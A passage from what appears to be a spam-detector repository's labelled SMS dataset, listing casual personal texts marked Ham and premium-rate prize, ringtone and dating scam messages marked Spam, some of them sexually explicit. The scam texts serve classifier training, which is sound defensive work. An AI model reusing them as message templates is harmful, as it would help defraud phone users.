go into the bedroom for a minute ? '' ''OK'', I sed in a sexy mood. She came out 5 minuts latr wid a cake...n My Wife, 87 | Ham There is a first time for everything :) 88 | Ham * Am on a train back from northampton so i'm afraid not! 89 | Ham Hi dear we saw dear. We both are happy. Where you my battery is low 90 | Ham Since when, which side, any fever, any vomitin. 91 | Ham Jus finish my lunch on my way home lor... I tot u dun wan 2 stay in sch today... 92 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u? 93 | Spam URGENT! We are trying to contact you. Last weekends draw shows that you have won a £900 prize GUARANTEED. Call 09061701939. Claim code S89. Valid 12hrs only 94 | Ham Does not operate after <#> or what 95 | Spam Buy Space Invaders 4 a chance 2 win orig Arcade Game console. Press 0 for Games Arcade (std WAP charge) See o2.co.uk/games 4 Terms + settings. No purchase 96 | Ham Why is that, princess? I bet the brothas are all chasing you! 97 | Ham What's nannys address? 98 | Ham "Two fundamentals of cool life: ""Walk, like you are the KING""...! OR ""Walk like you Dont care,whoever is the KING""!... Gud nyt" 99 | Ham Am i that much dirty fellow? 100 | Ham Were somewhere on Fredericksburg 101 | Ham Haven't seen my facebook, huh? Lol! 102 | Ham There r many model..sony ericson also der.. <#> ..it luks good bt i forgot modl no 103 | Ham I dont have i shall buy one dear 104 | Ham Sorry, I'll call later 105 | Ham I do know what u mean, is the king of not havin credit! I'm goin2bed now. Night night sweet! Only1more sleep! 106 | Ham Yes i thought so. Thanks. 107 | Ham Haha, that was the first person I was gonna ask 108 | Ham I'm going for bath will msg you next <#> min.. 109 | Ham I’m cool ta luv but v.tired 2 cause i have been doin loads of planning all wk, we have got our social services inspection at the nursery! Take care & spk sn x. 110 | Ham I thought slide is enough. 111 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 112 | Ham Also hi wesley how've you been 113 | Ham No sir. That's why i had an 8-hr trip on the bus last week. Have another audition next wednesday but i think i might drive this time. 114 | Ham I meant middle left or right? 115 | Ham Yeah, where's your class at? 116 | Ham Hmm, too many of them unfortunately... Pics obviously arent hot cakes. Its kinda fun tho 117 | Spam Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p 118 | Ham Big brother‘s really scraped the barrel with this shower of social misfits 119 | Ham Yar... I tot u knew dis would happen long ago already. 120 | Ham Ah, well that confuses things, doesnt it? I thought was friends with now. Maybe i did the wrong thing but i already sort of invited -tho he may not come cos of money. 121 | Ham Cool, we shall go and see, have to go to tip anyway. Are you at home, got something to drop in later? So lets go to town tonight! Maybe mum can take us in. 122 | Ham Yup i thk so until e shop closes lor. 123 | Ham No shit, but I wasn't that surprised, so I went and spent the evening with that french guy I met in town here and we fooled around a bit but I didn't let him fuck me 124 | Ham Just come home. I don't want u to be miserable 125 | Ham How many licks does it take to get to the center of a tootsie pop? 126 | Spam Missed call alert. These numbers called but left no message. 07008009200 127 | Ham For you information, IKEA is spelled with all caps. That is not yelling. when you thought i had left you, you were sitting on the bed among the mess when i came in. i said we were going after you got 128 | Ham Oh ! A half hour is much longer in Syria than Canada, eh ? Wow you must get SO much more work done in a day than us with all that extra time ! *grins* 129 | Ham It shall be fine. I have avalarr now. Will hollalater 130 | Ham We are both fine. Thanks 131 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop 132 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ 133 | Ham True. It is passable. And if you get a high score and apply for phd, you get 5years of salary. So it makes life easier. 134 | Spam Hi - this is your Mailbox Messaging SMS alert. You have 40 matches. Please call back on 09056242159 to retrieve your messages and matches cc100p/min 135 | Ham "Best line said in Love: . ""I will wait till the day I can forget u Or The day u realize that u cannot forget me.""... Gn" 136 | Ham Fun fact: although you would think armand would eventually build up a tolerance or some shit considering how much he smokes, he gets fucked up in like 2 hits 137 | Ham You've always been the brainy one. 138 | Ham I have a rather prominent bite mark on my right cheek 139 | Ham Home so we can always chat 140 | Ham Is there coming friday is leave for pongal?do you get any news from your work place. 141 | Ham K so am I, how much for an 8th? Fifty? 142 | Ham Dai i downloaded but there is only exe file which i can only run that exe after installing. 143 | Ham S:-)if we have one good partnership going we will take lead:) 144 | Ham And is there a way you can send shade's stuff to her. And she has been wonderful too. 145 | Spam Dont forget you can place as many FREE Requests with 1stchoice.co.uk as you wish. For more Information call 08707808226. 146 | Ham Dunno lei he neva say... 147 | Ham Hi Harish's rent has been transfred to ur Acnt. 148 | Ham Gettin rdy to ship comp 149 | Ham You will go to walmart. I.ll stay. 150 | Ham I'm still looking for a car to buy. And have not gone 4the driving test yet. 151 | Ham Fine i miss you very much. 152 | Spam RECPT 1/3. You have ordered a Ringtone. Your order is being processed... 153 | Ham Well there's still a bit left if you guys want to tonight 154 | Ham Hi. I'm always online on yahoo and would like to chat with you someday 155 | Ham Nope... C ü then... 156 | Ham What i mean is do they come chase you out when its over or is it stated you can watch as many movies as you want. 157 | Ham Ok... U enjoy ur shows... 158 | Ham Hello which the site to download songs its urgent pls 159 | Ham You are a great role model. You are giving so much and i really wish each day for a miracle but God as a reason for everything and i must say i wish i knew why but i dont. I've looked up to you since 160 | Ham Mmmm.... I cant wait to lick it! 161 | Ham It's wylie, you in tampa or sarasota? 162 | Ham Love has one law; Make happy the person you love. In the same way friendship has one law; Never make ur friend feel alone until you are alive.... Gud night 163 | Ham I'm really not up to it still tonight babe 164 | Ham U coming back 4 dinner rite? Dad ask me so i re confirm wif u... 165 | Ham The sign of maturity is not when we start saying big things.. But actually it is, when we start understanding small things... *HAVE A NICE EVENING* BSLVYL 166 | Spam You are being contacted by our Dating Service by someone you know! To find out who it is, call from your mobile or landline 09064017305 PoBox75LDNS7 167 | Ham How's it feel? Mr. Your not my real Valentine just my yo Valentine even tho u hardly play!! 168 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info 169 | Ham Howz that persons story 170 | Ham Sorry, I'll call later 171 | Ham Boooo you always work. Just quit. 172 | Ham Fyi I'm gonna call you sporadically starting at like <#> bc we are not not doin this shit 173 | Ham No problem with the renewal. I.ll do it right away but i dont know his details. 174 | Spam Free video camera phones with Half Price line rental for 12 mths and 500 cross ntwk mins 100 txts. Call MobileUpd8 08001950382 or Call2OptOut/674& 175 | Ham Tell my bad character which u Dnt lik in me. I'll try to change in <#> . I ll add tat 2 my new year resolution. Waiting for ur reply.Be frank...good morning. 176 | Ham I have gone into get info bt dont know what to do 177 | Ham My love ... I hope your not doing anything drastic. Don't you dare sell your pc or your phone ... 178 | Ham <#> is fast approaching. So, Wish u a very Happy New Year Happy Sankranti Happy republic day Happy Valentines Day Happy Shivratri Happy Ugadi Happy Fools day Happy May Day Happy Independence Da 179 | Ham Dear friends, sorry for the late information. Today is the birthday of our loving Ar.Praveesh. for more details log on to face book and see. Its his number + <#> . Dont miss a delicious treat. 180 | Ham Horrible gal. Me in sch doing some stuff. How come u got mc? 181 | Spam You have 1 new voicemail. Please call 08719181513. 182 | Ham No it will reach by 9 only. She telling she will be there. I dont know 183 | Ham Carlos says he'll be at mu in <#> minutes 184 | Spam SMSSERVICES. for yourinclusive text credits, pls goto www.comuk.net login= 3qxj9 unsubscribe with STOP, no extra charge. help 08702840625.COMUK. 220-CM2 9AE 185 | Ham Yes, princess. Toledo. 186 | Ham Ok ill send you with in <DECIMAL> ok. 187 | Ham I'm okay. Chasing the dream. What's good. What are you doing next. 188 | Ham Boo. How's things? I'm back at home and a little bored already :-( 189 | Ham What is important is that you prevent dehydration by giving her enough fluids 190 | Ham Am surfing online store. For offers do you want to buy any thing. 191 | Ham Buzz! Hey, my Love ! I think of you and hope your day goes well. Did you sleep in ? I miss you babe. I long for the moment we are together again*loving smile* 192 | Ham Turns out my friends are staying for the whole show and won't be back til ~ <#> , so feel free to go ahead and smoke that $ <#> worth 193 | Ham Yep. I do like the pink furniture tho. 194 | Ham In which place do you want da. 195 | Ham Hey happy birthday... 196 | Ham Going to take your babe out ? 197 | Spam Urgent! call 09066612661 from landline. Your complementary 4* Tenerife Holiday or £10,000 cash await collection SAE T&Cs PO Box 3 WA14 2PX 150ppm 18+ Sender: Hol Offer 198 | Ham Just checking in on you. Really do miss seeing Jeremiah. Do have a great month 199 | Ham Where are you?when wil you reach here? 200 | Ham Hmmm.still we dont have opener? 201 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09063458130 now! videochat wid your mates, play java games, Dload polyPH music, noline rentl. 202 | Ham Haha better late than ever, any way I could swing by? 203 | Spam Ur TONEXS subscription has been renewed and you have been charged £4.50. You can choose 10 more polys this month. www.clubzed.co.uk *BILLING MSG* 204 | Ham Another month. I need chocolate weed and alcohol. 205 | Spam How about getting in touch with folks waiting for company? Just txt back your NAME and AGE to opt in! Enjoy the community (150p/SMS) 206 | Ham Go chase after her and run her over while she's crossing the street 207 | Ham Is ur paper today in e morn or aft? 208 | Ham Lolnice. I went from a fish to ..water.? 209 | Ham Can you do online transaction? 210 | Ham Like <#> , same question 211 | Ham I got arrested for possession at, I shit you not, <TIME> pm 212 | Ham Hey gals...U all wanna meet 4 dinner at nìte? 213 | Ham Its hard to believe things like this. All can say lie but think twice before saying anything to me. 214 | Ham We not watching movie already. Xy wants 2 shop so i'm shopping w her now. 215 | Ham My exam is for february 4. Wish you a great day. 216 | Ham So do you have samus shoulders yet 217 | Ham You best watch what you say cause I get drunk as a motherfucker 218 | Ham have * good weekend. 219 | Ham Oh and by the way you do have more food in your fridge! Want to go out for a meal tonight? 220 | Ham happened here while you were adventuring 221 | Spam http//tms. widelive.com/index. wml?id=820554ad0a1705572711&first=true¡C C Ringtone¡ 222 | Ham Greetings me, ! Consider yourself excused. 223 | Ham I wont touch you with out your permission. 224 | Ham I don't know jack shit about anything or i'd say/ask something helpful but if you want you can pretend that I did and just text me whatever in response to the hypotheticalhuagauahahuagahyuhagga 225 | Ham Oh ho. Is this the first time u use these type of words 226 | Ham One small prestige problem now. 227 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone 228 | Ham Carlos'll be here in a minute if you still need to buy 229 | Ham Ü collecting ur laptop then going to configure da settings izzit? 230 | Ham Nice talking to you! please dont forget my pix :) i want to see all of you... 231 | Ham Its just the effect of irritation. Just ignore it 232 | Spam Sunshine Hols. To claim ur med holiday send a stamped self address envelope to Drinks on Us UK, PO Box 113, Bray, Wicklow, Eire. Quiz Starts Saturday! Unsub Stop 233 | Ham Thank you princess! You are so sexy... 234 | Ham He is world famamus.... 235 | Ham So ü'll be submitting da project tmr rite? 236 | Spam Valentines Day Special! Win over £1000 in our quiz and take your partner on the trip of a lifetime! Send GO to 83600 now. 150p/msg rcvd. CustCare:08718720201. 237 | Ham Yup... Hey then one day on fri we can ask miwa and jiayin take leave go karaoke 238 | Ham And you! Will expect you whenever you text! Hope all goes well tomo 239 | Ham Yup it's at paragon... I havent decided whether 2 cut yet... Hee... 240 | Ham "'An Amazing Quote'' - ""Sometimes in life its difficult to decide whats wrong!! a lie that brings a smile or the truth that brings a tear....""" 241 | Ham Let me know how it changes in the next 6hrs. It can even be appendix but you are out of that age range. However its not impossible. So just chill and let me know in 6hrs 242 | Ham Okie but i scared u say i fat... Then u dun wan me already... 243 | Spam we tried to contact you re your response to our offer of a new nokia fone and camcorder hit reply or call 08000930705 for delivery 244 | Ham Better than bb. If he wont use it, his wife will or them doctor 245 | Ham Shall i start from hear. 246 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply.. 247 | Spam You have 1 new message. Please call 08718738034. 248 | Ham Idk. I'm sitting here in a stop and shop parking lot right now bawling my eyes out because i feel like i'm a failure in everything. Nobody wants me and now i feel like i'm failing you. 249 | Spam This is the 2nd time we have tried to contact u. U have won the £1450 prize to claim just call 09053750005 b4 310303. T&Cs/stop SMS 08718725756. 140ppm 250 | Ham Hey mate. Spoke to the mag people. We‘re on. the is deliver by the end of the month. Deliver on the 24th sept. Talk later. 251 | Ham Your board is working fine. The issue of overheating is also reslove. But still software inst is pending. I will come around 8'o clock. 252 | Ham It does it on its own. Most of the time it fixes my spelling. But sometimes it gets a completely diff word. Go figure 253 | Ham Wish i were with you now! 254 | Ham Your gonna have to pick up a $1 burger for yourself on your way home. I can't even move. Pain is killing me. 255 | Spam Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com 256 | Ham Is ur lecture over? 257 | Ham Dont give a monkeys wot they think and i certainly don't mind. Any friend of mine&all that! Just don't sleep wiv , that wud be annoyin! 258 | -------------------------------------------------------------------------------- /spam_detector/spam_data/experiment_1/train_512.csv: -------------------------------------------------------------------------------- 1 | label text 2 | Ham Yeah I think my usual guy's still passed out from last night, if you get ahold of anybody let me know and I'll throw down 3 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876 4 | Spam Mila, age23, blonde, new in UK. I look sex with UK guys. if u like fun with me. Text MTALK to 69866.18 . 30pp/txt 1st 5free. £1.50 increments. Help08718728876 5 | Ham "And that is the problem. You walk around in ""julianaland"" oblivious to what is going on around you. I say the same things constantly and they go in one ear and out the other while you go off doing wha" 6 | Spam Urgent! Please call 09066612661 from your landline, your complimentary 4* Lux Costa Del Sol holiday or £1000 CASH await collection. ppm 150 SAE T&Cs James 28, EH74RR 7 | Spam We tried to call you re your reply to our sms for a video mobile 750 mins UNLIMITED TEXT free camcorder Reply or call now 08000930705 Del Thurs 8 | Spam Urgent! Please call 09061743811 from landline. Your ABTA complimentary 4* Tenerife Holiday or £5000 cash await collection SAE T&Cs Box 326 CW25WX 150ppm 9 | Ham The guy did some bitching but I acted like i'd be interested in buying something else next week and he gave it to us for free 10 | Spam Sorry I missed your call let's talk when you have the time. I'm on 07090201529 11 | Spam Free msg: Single? Find a partner in your area! 1000s of real people are waiting to chat now!Send CHAT to 62220Cncl send STOPCS 08717890890£1.50 per msg 12 | Ham I'm at work. Please call 13 | Ham K do I need a login or anything 14 | Spam Hi I'm sue. I am 20 years old and work as a lapdancer. I love sex. Text me live - I'm i my bedroom now. text SUE to 89555. By TextOperator G2 1DA 150ppmsg 18+ 15 | Ham S.s:)i thinl role is like sachin.just standing. Others have to hit. 16 | Ham Do you work all this week ? 17 | Spam Free tones Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk 18 | Ham Where is that one day training:-) 19 | Ham "What part of ""don't initiate"" don't you understand" 20 | Ham alright tyler's got a minor crisis and has to be home sooner than he thought so be here asap 21 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541 22 | Spam I'd like to tell you my deepest darkest fantasies. Call me 09094646631 just 60p/min. To stop texts call 08712460324 (nat rate) 23 | Spam Congrats! 1 year special cinema pass for 2 is yours. call 09061209465 now! C Suprman V, Matrix3, StarWars3, etc all 4 FREE! bx420-ip4-5we. 150pm. Dont miss out! 24 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030 25 | Spam 5 Free Top Polyphonic Tones call 087018728737, National Rate. Get a toppoly tune sent every week, just text SUBPOLY to 81618, £3 per pole. UnSub 08718727870. 26 | Ham Well, I have to leave for my class babe ... You never came back to me ... :-( ... Hope you have a nice sleep, my love 27 | Spam Hi ya babe x u 4goten bout me?' scammers getting smart..Though this is a regular vodafone no, if you respond you get further prem rate msg/subscription. Other nos used also. Beware! 28 | Ham HEY BABE! FAR 2 SPUN-OUT 2 SPK AT DA MO... DEAD 2 DA WRLD. BEEN SLEEPING ON DA SOFA ALL DAY, HAD A COOL NYTHO, TX 4 FONIN HON, CALL 2MWEN IM BK FRMCLOUD 9! J X 29 | Spam **FREE MESSAGE**Thanks for using the Auction Subscription Service. 18 . 150p/MSGRCVD 2 Skip an Auction txt OUT. 2 Unsubscribe txt STOP CustomerCare 08718726270 30 | Spam For sale - arsenal dartboard. Good condition but no doubles or trebles! 31 | Spam URGENT! Your Mobile number has been awarded a 2000 prize GUARANTEED. Call 09061790125 from landline. Claim 3030. Valid 12hrs only 150ppm 32 | Spam Win the newest “Harry Potter and the Order of the Phoenix (Book 5) reply HARRY, answer 5 questions - chance to be the first among readers! 33 | Ham Nan sonathaya soladha. Why boss? 34 | Ham It's fine, imma get a drink or somethin. Want me to come find you? 35 | Ham Ok. 36 | Ham Erm. I thought the contract ran out the4th of october. 37 | Spam 8007 25p 4 Alfie Moon's Children in Need song on ur mob. Tell ur m8s. Txt TONE CHARITY to 8007 for nokias or POLY CHARITY for polys :zed 08701417012 profit 2 charity 38 | Spam No. 1 Nokia Tone 4 ur mob every week! Just txt NOK to 87021. 1st Tone FREE ! so get txtin now and tell ur friends. 150p/tone. 16 reply HL 4info 39 | Spam Sexy Singles are waiting for you! Text your AGE followed by your GENDER as wither M or F E.G.23F. For gay men text your AGE followed by a G. e.g.23G. 40 | Spam Gr8 Poly tones 4 ALL mobs direct 2u rply with POLY TITLE to 8007 eg POLY BREATHE1 Titles: CRAZYIN, SLEEPINGWITH, FINEST, YMCA :getzed.co.uk POBox365O4W45WQ 300p 41 | Spam For ur chance to win a £250 cash every wk TXT: ACTION to 80608. T's&C's www.movietrivia.tv custcare 08712405022, 1x150p/wk. 42 | Ham Yes.he have good crickiting mind 43 | Ham HEY MATE! HOWS U HONEY?DID U AVE GOOD HOLIDAY? GIMMI DE GOSS!x 44 | Spam Free Top ringtone -sub to weekly ringtone-get 1st week free-send SUBPOLY to 81618-?3 per week-stop sms-08718727870 45 | Ham I love your ass! Do you enjoy doggy style? :) 46 | Ham Sometimes we put walls around our hearts,not just to be safe from getting hurt.. But to find out who cares enough to break the walls & get closer.. GOODNOON:) 47 | Ham 1 in cbe. 2 in chennai. 48 | Spam PRIVATE! Your 2003 Account Statement for 07753741225 shows 800 un-redeemed S. I. M. points. Call 08715203677 Identifier Code: 42478 Expires 24/10/04 49 | Ham NEFT Transaction with reference number <#> for Rs. <DECIMAL> has been credited to the beneficiary account on <#> at <TIME> : <#> 50 | Spam 88066 FROM 88066 LOST 3POUND HELP 51 | Spam Well done ENGLAND! Get the official poly ringtone or colour flag on yer mobile! text TONE or FLAG to 84199 NOW! Opt-out txt ENG STOP. Box39822 W111WX £1.50 52 | Ham How long before you get reply, just defer admission til next semester 53 | Ham Hi :)finally i completed the course:) 54 | Ham I am in tirupur da, once you started from office call me. 55 | Ham Happy birthday... May u find ur prince charming soon n dun work too hard... 56 | Ham Love it! Daddy will make you scream with pleasure! I am going to slap your ass with my dick! 57 | Ham Yup no more already... Thanx 4 printing n handing it up. 58 | Spam Wanna get laid 2nite? Want real Dogging locations sent direct to ur mobile? Join the UK's largest Dogging Network. Txt PARK to 69696 now! Nyt. ec2a. 3lp £1.50/msg 59 | Ham 2 and half years i missed your friendship:-) 60 | Ham Now got tv 2 watch meh? U no work today? 61 | Ham Aiyar hard 2 type. U later free then tell me then i call n scold n tell u. 62 | Spam WIN a £200 Shopping spree every WEEK Starting NOW. 2 play text STORE to 88039. SkilGme. TsCs08714740323 1Winawk! age16 £1.50perweeksub. 63 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins 64 | Spam U have a Secret Admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09065171142-stopsms-08 65 | Ham Good day to You too.Pray for me.Remove the teeth as its painful maintaining other stuff. 66 | Spam Thanks 4 your continued support Your question this week will enter u in2 our draw 4 £100 cash. Name the NEW US President? txt ans to 80082 67 | Spam 4mths half price Orange line rental & latest camera phones 4 FREE. Had your phone 11mths+? Call MobilesDirect free on 08000938767 to update now! or2stoptxt T&Cs 68 | Ham No one interested. May be some business plan. 69 | Ham Ya ok, then had dinner? 70 | Spam URGENT! Your mobile number *************** WON a £2000 Bonus Caller prize on 10/06/03! This is the 2nd attempt to reach you! Call 09066368753 ASAP! Box 97N7QP, 150ppm 71 | Ham Neshanth..tel me who r u? 72 | Ham Convey my regards to him 73 | Ham Idk. You keep saying that you're not, but since he moved, we keep butting heads over freedom vs. responsibility. And i'm tired. I have so much other shit to deal with that i'm barely keeping myself to 74 | Ham Sir, i am waiting for your call, once free please call me. 75 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+ 76 | Spam Thanks for your subscription to Ringtone UK your mobile will be charged £5/month Please confirm by replying YES or NO. If you reply NO you will not be charged 77 | Ham Set a place for me in your heart and not in your mind, as the mind easily forgets but the heart will always remember. Wish you Happy Valentines Day! 78 | Ham In xam hall boy asked girl Tell me the starting term for dis answer I can den manage on my own After lot of hesitation n lookin around silently she said THE! intha ponnungale ipaditan;) 79 | Ham Hey you gave them your photo when you registered for driving ah? Tmr wanna meet at yck? 80 | Spam FREE entry into our £250 weekly comp just send the word WIN to 80086 NOW. 18 T&C www.txttowin.co.uk 81 | Ham 1) Go to write msg 2) Put on Dictionary mode 3)Cover the screen with hand, 4)Press <#> . 5)Gently remove Ur hand.. Its interesting..:) 82 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05 83 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm 84 | Ham Its not that time of the month nor mid of the time? 85 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790126 from land line. Claim 3030. Valid 12hrs only 150ppm 86 | Spam Santa Calling! Would your little ones like a call from Santa Xmas eve? Call 09058094583 to book your time. 87 | Spam 3 FREE TAROT TEXTS! Find out about your love life now! TRY 3 FOR FREE! Text CHANCE to 85555 16 only! After 3 Free, Msgs £1.50 each 88 | Spam U were outbid by simonwatson5120 on the Shinco DVD Plyr. 2 bid again, visit sms. ac/smsrewards 2 end bid notifications, reply END OUT 89 | Spam URGENT! We are trying to contact U Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050000460 from land line. Claim J89. po box245c2150pm 90 | Spam Get 3 Lions England tone, reply lionm 4 mono or lionp 4 poly. 4 more go 2 www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply. 91 | Ham Now that you have started dont stop. Just pray for more good ideas and anything i see that can help you guys i.ll forward you a link. 92 | Spam Customer service announcement. We recently tried to make a delivery to you but were unable to do so, please call 07090298926 to re-schedule. Ref:9307622 93 | Ham Why are u up so early? 94 | Ham Exactly. Anyways how far. Is jide her to study or just visiting 95 | Ham No. I.ll meet you in the library 96 | Ham I don't run away frm u... I walk slowly & it kills me that u don't care enough to stop me... 97 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it! 98 | Spam URGENT, IMPORTANT INFORMATION FOR O2 USER. TODAY IS YOUR LUCKY DAY! 2 FIND OUT WHY LOG ONTO HTTP://WWW.URAWINNER.COM THERE IS A FANTASTIC SURPRISE AWAITING FOR YOU 99 | Ham At 4. Let's go to bill millers 100 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co 101 | Ham Never try alone to take the weight of a tear that comes out of ur heart and falls through ur eyes... Always remember a STUPID FRIEND is here to share... BSLVYL 102 | Ham New car and house for my parents.:)i have only new job in hand:) 103 | Spam Your weekly Cool-Mob tones are ready to download !This weeks new Tones include: 1) Crazy Frog-AXEL F>>> 2) Akon-Lonely>>> 3) Black Eyed-Dont P >>>More info in n 104 | Ham If you ask her or she say any please message. 105 | Ham Sorry,in meeting I'll call later 106 | Ham I'll text carlos and let you know, hang on 107 | Ham I want to sent <#> mesages today. Thats y. Sorry if i hurts 108 | Ham Si.como no?!listened2the plaid album-quite gd&the new air1 which is hilarious-also bought”braindance”a comp.ofstuff on aphex’s ;abel,u hav2hear it!c u sn xxxx 109 | Ham 5 nights...We nt staying at port step liao...Too ex 110 | Ham Can u get pic msgs to your phone? 111 | Spam Call 09095350301 and send our girls into erotic ecstacy. Just 60p/min. To stop texts call 08712460324 (nat rate) 112 | Ham K.k.how is your business now? 113 | Spam FreeMsg Today's the day if you are ready! I'm horny & live in your town. I love sex fun & games! Netcollex Ltd 08700621170150p per msg reply Stop to end 114 | Ham Have you heard from this week? 115 | Spam CLAIRE here am havin borin time & am now alone U wanna cum over 2nite? Chat now 09099725823 hope 2 C U Luv CLAIRE xx Calls£1/minmoremobsEMSPOBox45PO139WA 116 | Spam Romantic Paris. 2 nights, 2 flights from £79 Book now 4 next year. Call 08704439680Ts&Cs apply. 117 | Ham Talk to g and x about that 118 | Ham Go until jurong point, crazy.. Available only in bugis n great world la e buffet... Cine there got amore wat... 119 | Ham K then 2marrow are you coming to class. 120 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX 121 | Spam Dear Voucher Holder, To claim this weeks offer, at your PC please go to http://www.wtlp.co.uk/text. Ts&Cs apply. 122 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription 123 | Spam Married local women looking for discreet action now! 5 real matches instantly to your phone. Text MATCH to 69969 Msg cost 150p 2 stop txt stop BCMSFWC1N3XX 124 | Spam Someone has conacted our dating service and entered your phone because they fancy you!To find out who it is call from landline 09111030116. PoBox12n146tf15 125 | Ham Shhhhh nobody is supposed to know! 126 | Ham I'm home. Doc gave me pain meds says everything is fine. 127 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer 128 | Ham how tall are you princess? 129 | Ham What time. I‘m out until prob 3 or so 130 | Spam Knock Knock Txt whose there to 80082 to enter r weekly draw 4 a £250 gift voucher 4 a store of yr choice. T&Cs www.tkls.com age16 to stoptxtstop£1.50/week 131 | Ham Love you aathi..love u lot.. 132 | Spam sexy sexy cum and text me im wet and warm and ready for some porn! u up for some fun? THIS MSG IS FREE RECD MSGS 150P INC VAT 2 CANCEL TEXT STOP 133 | Spam You have an important customer service announcement. Call FREEPHONE 0800 542 0825 now! 134 | Spam Do you want a new Video handset? 750 any time any network mins? UNLIMITED TEXT? Camcorder? Reply or Call now 08000930705 for del Sat AM 135 | Ham Nothin comes to my mind. Ü help me buy hanger lor. Ur laptop not heavy? 136 | Ham Long beach lor. Expected... U having dinner now? 137 | Ham Talk With Yourself Atleast Once In A Day...!!! Otherwise You Will Miss Your Best FRIEND In This WORLD...!!! -Shakespeare- SHESIL <#> 138 | Ham A little. Meds say take once every 8 hours. It's only been 5 but pain is back. So I took another. Hope I don't die 139 | Ham Its like that hotel dusk game i think. You solve puzzles in a area thing 140 | Spam Want a new Video Phone? 750 anytime any network mins? Half price line rental free text for 3 months? Reply or call 08000930705 for free delivery 141 | Spam EASTENDERS TV Quiz. What FLOWER does DOT compare herself to? D= VIOLET E= TULIP F= LILY txt D E or F to 84025 NOW 4 chance 2 WIN £100 Cash WKENT/150P16+ 142 | Ham Beerage? 143 | Ham V nice! Off 2 sheffield tom 2 air my opinions on categories 2 b used 2 measure ethnicity in next census. Busy transcribing. :-) 144 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country the Algarve is in? Txt ansr to 82277. £1.50 SP:Tyrone 145 | Spam From next month get upto 50% More Calls 4 Ur standard network charge 2 activate Call 9061100010 C Wire3.net 1st4Terms PoBox84 M26 3UZ Cost £1.50 min MobcudB more 146 | Ham Fuck babe ... I miss you already, you know ? Can't you let me send you some money towards your net ? I need you ... I want you ... I crave you ... 147 | Ham Mm you ask him to come its enough :-) 148 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09061790121 from land line. Claim 3030. Valid 12hrs only 150ppm 149 | Ham Am in gobi arts college 150 | Spam Thank you, winner notified by sms. Good Luck! No future marketing reply STOP to 84122 customer services 08450542832 151 | Ham She's fine. Good to hear from you. How are you my dear? Happy new year oh. 152 | Spam URGENT! Your Mobile number has been awarded with a £2000 Bonus Caller Prize. Call 09058095201 from land line. Valid 12hrs only 153 | Spam Claim a 200 shopping spree, just call 08717895698 now! Have you won! MobStoreQuiz10ppm 154 | Spam U’ve Bin Awarded £50 to Play 4 Instant Cash. Call 08715203028 To Claim. EVERY 9th Player Wins Min £50-£500. OptOut 08718727870 155 | Spam Please CALL 08712402578 immediately as there is an urgent message waiting for you 156 | Spam +123 Congratulations - in this week's competition draw u have won the £1450 prize to claim just call 09050002311 b4280703. T&Cs/stop SMS 08718727868. Over 18 only 150ppm 157 | Ham It should take about <#> min 158 | Spam Sex up ur mobile with a FREE sexy pic of Jordan! Just text BABE to 88600. Then every wk get a sexy celeb! PocketBabe.co.uk 4 more pics. 16 £3/wk 087016248 159 | Spam January Male Sale! Hot Gay chat now cheaper, call 08709222922. National rate from 1.5p/min cheap to 7.8p/min peak! To stop texts call 08712460324 (10p/min) 160 | Spam Double Mins & Double Txt & 1/2 price Linerental on Latest Orange Bluetooth mobiles. Call MobileUpd8 for 